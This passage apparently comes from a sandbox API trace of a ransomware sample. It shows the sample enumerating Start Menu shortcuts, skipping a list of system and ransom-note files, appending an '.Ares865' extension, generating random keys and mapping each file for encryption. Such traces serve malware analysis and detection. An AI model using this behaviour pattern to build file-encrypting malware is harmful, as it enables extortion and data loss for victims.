HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0068.242] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0068.242] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0068.242] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0068.242] CloseHandle (hObject=0x12c) returned 1 [0068.242] CloseHandle (hObject=0x15c) returned 1 [0068.242] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0068.242] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0068.242] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0068.243] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2d8b74ec, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x2d8b74ec, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x2da0e14f, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x4da, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Paint.lnk", cAlternateFileName="")) returned 1 [0068.243] lstrcmpiW (lpString1="Paint.lnk", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0068.243] lstrcmpiW (lpString1="Paint.lnk", lpString2="aoldtz.exe") returned 1 [0068.243] lstrcmpiW (lpString1="Paint.lnk", lpString2=".") returned 1 [0068.243] lstrcmpiW (lpString1="Paint.lnk", lpString2="..") returned 1 [0068.243] lstrcmpiW (lpString1="Paint.lnk", lpString2="windows") returned -1 [0068.243] lstrcmpiW (lpString1="Paint.lnk", lpString2="bootmgr") returned 1 [0068.243] lstrcmpiW (lpString1="Paint.lnk", lpString2="temp") returned -1 [0068.243] lstrcmpiW (lpString1="Paint.lnk", lpString2="pagefile.sys") returned 1 [0068.243] lstrcmpiW (lpString1="Paint.lnk", lpString2="boot") returned 1 [0068.243] lstrcmpiW (lpString1="Paint.lnk", lpString2="ids.txt") returned 1 [0068.243] lstrcmpiW (lpString1="Paint.lnk", lpString2="ntuser.dat") returned 1 [0068.243] lstrcmpiW (lpString1="Paint.lnk", lpString2="perflogs") returned -1 [0068.243] lstrcmpiW (lpString1="Paint.lnk", lpString2="MSBuild") returned 1 [0068.243] lstrlenW (lpString="Paint.lnk") returned 9 [0068.243] lstrlenW (lpString="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\NetworkProjection.lnk") returned 72 [0068.243] lstrcpyW (in: lpString1=0x2cce466, lpString2="Paint.lnk" | out: lpString1="Paint.lnk") returned="Paint.lnk" [0068.243] lstrlenW (lpString="Paint.lnk") returned 9 [0068.243] lstrlenW (lpString="Ares865") returned 7 [0068.243] lstrcmpiW (lpString1="int.lnk", lpString2="Ares865") returned 1 [0068.243] lstrlenW (lpString=".dll") returned 4 [0068.243] lstrcmpiW (lpString1="Paint.lnk", lpString2=".dll") returned 1 [0068.243] lstrlenW (lpString=".lnk") returned 4 [0068.243] lstrcmpiW (lpString1="Paint.lnk", lpString2=".lnk") returned 1 [0068.243] lstrlenW (lpString=".ini") returned 4 [0068.243] lstrcmpiW (lpString1="Paint.lnk", lpString2=".ini") returned 1 [0068.243] lstrlenW (lpString=".sys") returned 4 [0068.243] lstrcmpiW (lpString1="Paint.lnk", lpString2=".sys") returned 1 [0068.243] lstrlenW (lpString="Paint.lnk") returned 9 [0068.243] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\Paint.lnk.Ares865") returned 68 [0068.244] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\Paint.lnk" (normalized: "c:\\users\\all users\\start menu\\programs\\accessories\\paint.lnk"), lpNewFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\Paint.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\accessories\\paint.lnk.ares865"), dwFlags=0x1) returned 1 [0068.244] CreateFileW (lpFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\Paint.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\accessories\\paint.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0068.245] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1242) returned 1 [0068.245] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0068.245] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0068.245] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0068.245] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0068.246] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0068.246] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0068.246] CreateFileMappingW (hFile=0x15c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7e0, lpName=0x0) returned 0x12c [0068.246] MapViewOfFile (hFileMappingObject=0x12c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7e0) returned 0x190000 [0068.246] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0068.247] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0068.247] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0068.247] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3148 [0068.247] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3148 | out: hHeap=0x2b0000) returned 1 [0068.247] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0068.247] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0068.247] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0068.247] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0068.247] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9710 [0068.248] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0068.248] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9710 | out: hHeap=0x2b0000) returned 1 [0068.248] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0068.248] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0068.248] CloseHandle (hObject=0x12c) returned 1 [0068.248] CloseHandle (hObject=0x15c) returned 1 [0068.249] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0068.249] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0068.249] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0068.249] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x173a8e5b, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x173a8e5b, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x174413dc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x557, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Remote Desktop Connection.lnk", cAlternateFileName="REMOTE~1.LNK")) returned 1 [0068.249] lstrcmpiW (lpString1="Remote Desktop Connection.lnk", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0068.249] lstrcmpiW (lpString1="Remote Desktop Connection.lnk", lpString2="aoldtz.exe") returned 1 [0068.249] lstrcmpiW (lpString1="Remote Desktop Connection.lnk", lpString2=".") returned 1 [0068.249] lstrcmpiW (lpString1="Remote Desktop Connection.lnk", lpString2="..") returned 1 [0068.249] lstrcmpiW (lpString1="Remote Desktop Connection.lnk", lpString2="windows") returned -1 [0068.249] lstrcmpiW (lpString1="Remote Desktop Connection.lnk", lpString2="bootmgr") returned 1 [0068.249] lstrcmpiW (lpString1="Remote Desktop Connection.lnk", lpString2="temp") returned -1 [0068.249] lstrcmpiW (lpString1="Remote Desktop Connection.lnk", lpString2="pagefile.sys") returned 1 [0068.249] lstrcmpiW (lpString1="Remote Desktop Connection.lnk", lpString2="boot") returned 1 [0068.249] lstrcmpiW (lpString1="Remote Desktop Connection.lnk", lpString2="ids.txt") returned 1 [0068.249] lstrcmpiW (lpString1="Remote Desktop Connection.lnk", lpString2="ntuser.dat") returned 1 [0068.249] lstrcmpiW (lpString1="Remote Desktop Connection.lnk", lpString2="perflogs") returned 1 [0068.249] lstrcmpiW (lpString1="Remote Desktop Connection.lnk", lpString2="MSBuild") returned 1 [0068.249] lstrlenW (lpString="Remote Desktop Connection.lnk") returned 29 [0068.249] lstrlenW (lpString="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\Paint.lnk") returned 60 [0068.249] lstrcpyW (in: lpString1=0x2cce466, lpString2="Remote Desktop Connection.lnk" | out: lpString1="Remote Desktop Connection.lnk") returned="Remote Desktop Connection.lnk" [0068.249] lstrlenW (lpString="Remote Desktop Connection.lnk") returned 29 [0068.249] lstrlenW (lpString="Ares865") returned 7 [0068.249] lstrcmpiW (lpString1="ion.lnk", lpString2="Ares865") returned 1 [0068.250] lstrlenW (lpString=".dll") returned 4 [0068.250] lstrcmpiW (lpString1="Remote Desktop Connection.lnk", lpString2=".dll") returned 1 [0068.250] lstrlenW (lpString=".lnk") returned 4 [0068.250] lstrcmpiW (lpString1="Remote Desktop Connection.lnk", lpString2=".lnk") returned 1 [0068.250] lstrlenW (lpString=".ini") returned 4 [0068.250] lstrcmpiW (lpString1="Remote Desktop Connection.lnk", lpString2=".ini") returned 1 [0068.250] lstrlenW (lpString=".sys") returned 4 [0068.250] lstrcmpiW (lpString1="Remote Desktop Connection.lnk", lpString2=".sys") returned 1 [0068.250] lstrlenW (lpString="Remote Desktop Connection.lnk") returned 29 [0068.250] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\Remote Desktop Connection.lnk.Ares865") returned 88 [0068.250] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\Remote Desktop Connection.lnk" (normalized: "c:\\users\\all users\\start menu\\programs\\accessories\\remote desktop connection.lnk"), lpNewFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\Remote Desktop Connection.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\accessories\\remote desktop connection.lnk.ares865"), dwFlags=0x1) returned 1 [0068.251] CreateFileW (lpFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\Remote Desktop Connection.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\accessories\\remote desktop connection.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0068.251] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1367) returned 1 [0068.251] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0068.252] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0068.252] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0068.252] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0068.252] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0068.252] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0068.253] CreateFileMappingW (hFile=0x15c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x860, lpName=0x0) returned 0x154 [0068.254] MapViewOfFile (hFileMappingObject=0x154, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x860) returned 0x190000 [0068.255] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0068.256] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0068.256] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0068.256] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3148 [0068.256] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3148 | out: hHeap=0x2b0000) returned 1 [0068.256] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0068.256] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0068.256] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0068.256] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0068.256] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0068.256] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0068.256] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0068.256] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0068.256] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0068.257] CloseHandle (hObject=0x154) returned 1 [0068.257] CloseHandle (hObject=0x15c) returned 1 [0068.257] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0068.257] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0068.257] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0068.257] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x81caf400, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0x81caf400, ftLastAccessTime.dwHighDateTime=0x1d2de2a, ftLastWriteTime.dwLowDateTime=0x81caf400, ftLastWriteTime.dwHighDateTime=0x1d2de2a, nFileSizeHigh=0x0, nFileSizeLow=0x4f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Snipping Tool.lnk", cAlternateFileName="SNIPPI~1.LNK")) returned 1 [0068.257] lstrcmpiW (lpString1="Snipping Tool.lnk", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0068.257] lstrcmpiW (lpString1="Snipping Tool.lnk", lpString2="aoldtz.exe") returned 1 [0068.257] lstrcmpiW (lpString1="Snipping Tool.lnk", lpString2=".") returned 1 [0068.257] lstrcmpiW (lpString1="Snipping Tool.lnk", lpString2="..") returned 1 [0068.257] lstrcmpiW (lpString1="Snipping Tool.lnk", lpString2="windows") returned -1 [0068.257] lstrcmpiW (lpString1="Snipping Tool.lnk", lpString2="bootmgr") returned 1 [0068.257] lstrcmpiW (lpString1="Snipping Tool.lnk", lpString2="temp") returned -1 [0068.257] lstrcmpiW (lpString1="Snipping Tool.lnk", lpString2="pagefile.sys") returned 1 [0068.257] lstrcmpiW (lpString1="Snipping Tool.lnk", lpString2="boot") returned 1 [0068.257] lstrcmpiW (lpString1="Snipping Tool.lnk", lpString2="ids.txt") returned 1 [0068.257] lstrcmpiW (lpString1="Snipping Tool.lnk", lpString2="ntuser.dat") returned 1 [0068.257] lstrcmpiW (lpString1="Snipping Tool.lnk", lpString2="perflogs") returned 1 [0068.257] lstrcmpiW (lpString1="Snipping Tool.lnk", lpString2="MSBuild") returned 1 [0068.257] lstrlenW (lpString="Snipping Tool.lnk") returned 17 [0068.258] lstrlenW (lpString="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\Remote Desktop Connection.lnk") returned 80 [0068.258] lstrcpyW (in: lpString1=0x2cce466, lpString2="Snipping Tool.lnk" | out: lpString1="Snipping Tool.lnk") returned="Snipping Tool.lnk" [0068.258] lstrlenW (lpString="Snipping Tool.lnk") returned 17 [0068.258] lstrlenW (lpString="Ares865") returned 7 [0068.258] lstrcmpiW (lpString1="ool.lnk", lpString2="Ares865") returned 1 [0068.258] lstrlenW (lpString=".dll") returned 4 [0068.258] lstrcmpiW (lpString1="Snipping Tool.lnk", lpString2=".dll") returned 1 [0068.258] lstrlenW (lpString=".lnk") returned 4 [0068.258] lstrcmpiW (lpString1="Snipping Tool.lnk", lpString2=".lnk") returned 1 [0068.258] lstrlenW (lpString=".ini") returned 4 [0068.258] lstrcmpiW (lpString1="Snipping Tool.lnk", lpString2=".ini") returned 1 [0068.258] lstrlenW (lpString=".sys") returned 4 [0068.258] lstrcmpiW (lpString1="Snipping Tool.lnk", lpString2=".sys") returned 1 [0068.258] lstrlenW (lpString="Snipping Tool.lnk") returned 17 [0068.258] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\Snipping Tool.lnk.Ares865") returned 76 [0068.258] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\Snipping Tool.lnk" (normalized: "c:\\users\\all users\\start menu\\programs\\accessories\\snipping tool.lnk"), lpNewFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\Snipping Tool.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\accessories\\snipping tool.lnk.ares865"), dwFlags=0x1) returned 1 [0068.259] CreateFileW (lpFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\Snipping Tool.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\accessories\\snipping tool.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0068.259] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1272) returned 1 [0068.259] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0068.260] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0068.260] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0068.260] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0068.260] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0068.260] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0068.261] CreateFileMappingW (hFile=0x15c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x800, lpName=0x0) returned 0x154 [0068.261] MapViewOfFile (hFileMappingObject=0x154, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x800) returned 0x190000 [0068.261] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0068.262] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0068.262] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0068.262] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3148 [0068.262] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3148 | out: hHeap=0x2b0000) returned 1 [0068.262] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0068.262] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0068.262] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0068.262] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0068.262] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9710 [0068.262] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0068.262] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9710 | out: hHeap=0x2b0000) returned 1 [0068.262] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0068.262] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0068.262] CloseHandle (hObject=0x154) returned 1 [0068.262] CloseHandle (hObject=0x15c) returned 1 [0068.263] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0068.263] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0068.263] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0068.263] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8aad4ba5, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x8aad4ba5, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x8aad4ba5, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x532, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Sound Recorder.lnk", cAlternateFileName="SOUNDR~1.LNK")) returned 1 [0068.264] lstrcmpiW (lpString1="Sound Recorder.lnk", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0068.264] lstrcmpiW (lpString1="Sound Recorder.lnk", lpString2="aoldtz.exe") returned 1 [0068.264] lstrcmpiW (lpString1="Sound Recorder.lnk", lpString2=".") returned 1 [0068.264] lstrcmpiW (lpString1="Sound Recorder.lnk", lpString2="..") returned 1 [0068.264] lstrcmpiW (lpString1="Sound Recorder.lnk", lpString2="windows") returned -1 [0068.264] lstrcmpiW (lpString1="Sound Recorder.lnk", lpString2="bootmgr") returned 1 [0068.264] lstrcmpiW (lpString1="Sound Recorder.lnk", lpString2="temp") returned -1 [0068.264] lstrcmpiW (lpString1="Sound Recorder.lnk", lpString2="pagefile.sys") returned 1 [0068.264] lstrcmpiW (lpString1="Sound Recorder.lnk", lpString2="boot") returned 1 [0068.264] lstrcmpiW (lpString1="Sound Recorder.lnk", lpString2="ids.txt") returned 1 [0068.264] lstrcmpiW (lpString1="Sound Recorder.lnk", lpString2="ntuser.dat") returned 1 [0068.264] lstrcmpiW (lpString1="Sound Recorder.lnk", lpString2="perflogs") returned 1 [0068.264] lstrcmpiW (lpString1="Sound Recorder.lnk", lpString2="MSBuild") returned 1 [0068.264] lstrlenW (lpString="Sound Recorder.lnk") returned 18 [0068.264] lstrlenW (lpString="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\Snipping Tool.lnk") returned 68 [0068.264] lstrcpyW (in: lpString1=0x2cce466, lpString2="Sound Recorder.lnk" | out: lpString1="Sound Recorder.lnk") returned="Sound Recorder.lnk" [0068.264] lstrlenW (lpString="Sound Recorder.lnk") returned 18 [0068.264] lstrlenW (lpString="Ares865") returned 7 [0068.264] lstrcmpiW (lpString1="der.lnk", lpString2="Ares865") returned 1 [0068.264] lstrlenW (lpString=".dll") returned 4 [0068.264] lstrcmpiW (lpString1="Sound Recorder.lnk", lpString2=".dll") returned 1 [0068.264] lstrlenW (lpString=".lnk") returned 4 [0068.264] lstrcmpiW (lpString1="Sound Recorder.lnk", lpString2=".lnk") returned 1 [0068.264] lstrlenW (lpString=".ini") returned 4 [0068.264] lstrcmpiW (lpString1="Sound Recorder.lnk", lpString2=".ini") returned 1 [0068.264] lstrlenW (lpString=".sys") returned 4 [0068.264] lstrcmpiW (lpString1="Sound Recorder.lnk", lpString2=".sys") returned 1 [0068.264] lstrlenW (lpString="Sound Recorder.lnk") returned 18 [0068.264] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\Sound Recorder.lnk.Ares865") returned 77 [0068.264] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\Sound Recorder.lnk" (normalized: "c:\\users\\all users\\start menu\\programs\\accessories\\sound recorder.lnk"), lpNewFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\Sound Recorder.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\accessories\\sound recorder.lnk.ares865"), dwFlags=0x1) returned 1 [0068.266] CreateFileW (lpFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\Sound Recorder.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\accessories\\sound recorder.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0068.266] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1330) returned 1 [0068.266] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0068.266] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0068.266] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0068.267] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f00d8) returned 1 [0068.268] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0068.268] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0068.268] CreateFileMappingW (hFile=0x15c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x840, lpName=0x0) returned 0x154 [0068.269] MapViewOfFile (hFileMappingObject=0x154, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x840) returned 0x190000 [0068.270] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f00d8) returned 1 [0068.270] CryptGenRandom (in: 